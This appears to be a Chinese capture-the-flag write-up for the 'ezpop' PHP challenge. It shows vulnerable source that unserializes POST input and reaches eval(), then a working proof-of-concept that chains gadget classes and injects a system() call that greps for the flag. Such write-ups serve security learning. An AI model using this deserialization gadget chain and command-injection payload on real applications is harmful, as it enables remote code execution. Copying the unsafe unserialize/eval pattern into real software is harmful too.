ezpop
直接得到源码:
<?php
class crow
{
public $v1;
public $v2;
function eval() {
echo new $this->v1($this->v2);
}
public function __invoke()
{
$this->v1->world();
}
}
class fin
{
public $f1;
public function __destruct()
{
echo $this->f1 . '114514';
}
public function run()
{
($this->f1)();
}
public function __call($a, $b)
{
echo $this->f1->get_flag();
}
}
class what
{
public $a;
public function __toString()
{
$this->a->run();
return 'hello';
}
}
class mix
{
public $m1;
public function run()
{
($this->m1)();
}
public function get_flag()
{
eval('#' . $this->m1);
}
}
if (isset($_POST['cmd'])) {
unserialize($_POST['cmd']);
} else {
highlight_file(__FILE__);
}
pop链:
poc:
<?php
class crow
{
public $v1;
public $v2;
public function __construct($v1,$v2)
{
$this->v1 = $v1;
$this->v2 = $v2;
}
}
class fin
{
public $f1;
public function __construct($f1)
{
$this->f1 = $f1;
}
}
class what
{
public $a;
public function __construct($a)
{
$this->a = $a;
}
}
class mix
{
public function __construct($m1)
{
$this->m1 = $m1;
}
}
$a = new fin(new what(new mix(new crow(new fin(new mix(';
system(\'grep -r "{"\');')),''))));
echo urlencode(serialize($a));
小记:
因为太菜了所以比赛的时候只做出了pop,其他题目等复现了再放上来